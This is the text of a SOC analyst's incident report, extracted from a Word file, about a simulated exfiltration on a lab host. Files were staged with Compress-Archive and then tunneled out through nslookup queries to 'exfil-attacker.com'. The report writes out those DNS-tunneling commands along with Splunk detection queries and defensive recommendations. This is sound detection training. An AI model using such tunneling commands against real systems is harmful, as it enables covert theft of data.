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SOC INCIDENT INVESTIGATION REPORT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Security Operations Center  |  Level 1 Analyst  |  CONFIDENTIAL</w:t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INCIDENT SUMMARY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Report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IR-2026-005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 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Time Detected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14:49:22 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Jimil Joshi — SOC L1 Analyst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INVESTIGATED — ESCALATED TO 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Exfiltration — Data Staging + DNS Tunneling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Affected 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JIMIL-JOSHI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Affected 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Event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4688 — Process Creation (Compress-Archive, nslookup)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T1560 / T1048 / T1071.004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TRUE POSITIVE — Data Exfiltration Confirmed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SCENARIO DESCRIPTION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data exfiltration scenario was investigated on host JIMIL-JOSHI representing an attacker who has gathered sensitive files and attempts to remove them from the network using a stealthy method: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Sensitive files compressed into an archive using PowerShell Compress-Archive (data staging)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exfiltrated via 8 rapid DNS queries to an attacker-controlled domain, encoding data as subdomain labels ('DNS tunneling')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DNS tunneling is favored by real attackers because DNS traffic is rarely inspected or blocked by network firewalls, making it an effective covert exfiltration channel.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INVESTIGATION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1 — Data Staging Detection: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index=main sourcetype="WinEventLog:Security" EventCode=4688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search New_Process_Name="*powershell*" Process_Command_Line="*Compress-Archive*"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table _time, Account_Name, New_Process_Name, Process_Command_Line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sort -_time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Result: 1 event found — PowerShell Compress-Archive executed by account 'hp', compressing C:\SensitiveData into stolen_data.zip.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2 — DNS Query Detection (Initial Attempt — Detection Gap):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query against the dedicated DNS Client Operational log returned 0 events for the suspicious domain, mirroring a similar gap observed in the Ransomware scenario.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3 — Broad Validation Search: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broader search across all sourcetypes for the string 'exfil-attacker' revealed the evidence was instead fully captured under WinEventLog:Security via Event ID 4688, since each nslookup invocation spawns a logged process containing the full command line.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4 — Final Working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index=main sourcetype="WinEventLog:Security" EventCode=4688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search New_Process_Name="*nslookup*"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table _time, Account_Name, Process_Command_Line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| sort -_time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Result: 8 nslookup events found, all targeting 'exfil-attacker.com' with chunk-style subdomains, occurring within approximately 4 seconds.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FINDINGS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DNS Query (Process Command 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14:49:31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nslookup secretdata789ghi.exfil-attacker.com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14:49:32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nslookup chunk001.exfil-attacker.com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14:49:32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nslookup chunk002.exfil-attacker.com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14:49:33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nslookup chunk003.exfil-attacker.com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14:49:33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nslookup chunk004.exfil-attacker.com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14:49:34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nslookup chunk005.exfil-attacker.com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ATTACK TIMELINE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14:49:22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Sensitive files compressed into stolen_data.zip (data staging)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14:49:31 – 14:49:34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DNS queries to exfil-attacker.com in ~4 seconds (DNS tunneling)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14:54:25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 L1 analyst broad search confirms detection gap and locates evidence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14:56:19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Final detection query confirms full attack chain — True Positive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15:05:00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Incident documented and escalated to SOC L2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MITRE ATT&amp;CK MAPPING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18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Tactic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Archive Collected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T1560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Compress-Archive executed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Exfiltration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Exfiltration Over Alternative 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DNS queries detected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Command and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Application Layer Protocol: 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T1071.004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Chunk-style subdomain pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="C00000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7. VERDICT &amp; ANALYSIS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TRUE POSITIVE — Data Exfiltration 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— Staging followed immediately by high-frequency DNS queries to one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Data Exfiltrated?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(simulated) — chunk-style DNS queries indicate data encoded in subdomains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Detection Gap Found?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DNS Client Operational log returned 0 events; evidence found via Event 4688 instead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Escalate?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— Escalate to SOC L2 to assess scope and block destination domain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compression immediately followed by a burst of DNS queries to a single suspicious domain is a high-confidence exfiltration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Chunk-style subdomain naming (chunk001, chunk002...) is consistent with real-world DNS tunneling tools that split data into small encoded pieces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 queries within ~4 seconds is an abnormal frequency inconsistent with normal user DNS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genuine detection gap was identified in the DNS Client Operational log, successfully compensated for via Event ID 4688 process logging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 RESPONSE ACTIONS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Immediate Actions Taken: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Data staging and DNS tunneling pattern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Detection gap identified and alternate evidence source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Incident documented and escalated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✅ Test files and archive cleaned up from host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Recommended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🔴 Block destination domain 'exfil-attacker.com' at DNS/firewall level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🔴 Escalate to SOC L2 to determine scope of data already exfiltrated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🔴 Review DNS logs network-wide for similar chunk-style query patterns from other hosts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26B0A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">🟡 Implement DNS query rate-limiting and anomaly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26B0A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">🟡 Deploy DNS security tooling capable of detecting tunneling via entropy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🟢 Create a Splunk alert for high-frequency DNS queries to a single domain in a short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🟢 Fix DNS Client Operational log visibility gap for future investigations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E3A5F" w:val="clear"/>
        <w:spacing w:after="100" w:before="2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9. CONCLUSION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investigation confirms a data exfiltration attempt on host JIMIL-JOSHI through data staging via file compression followed by DNS tunneling — 8 rapid queries to a single attacker-controlled domain using chunk-style subdomain encoding. The investigation also demonstrated a critical real-world SOC skill: when a primary log source (DNS Client Operational) showed a visibility gap, the analyst successfully located complete evidence through an alternate source (Process Creation logging). This incident has been classified as Critical severity and escalated to SOC L2 with a recommendation to block the destination domain and assess exfiltration scope.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Investigated By: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Jimil Joshi — SOC L1 Analyst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Date: 19 June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Escalated To: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L2 Analyst</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="E26B0A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Status: Pending Scope Assessment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3A5F" w:val="clear"/>
        <w:spacing w:after="0" w:before="16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 — FOR INTERNAL SOC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2026-06-19T09:32:17.778Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-19T09:32:17.793Z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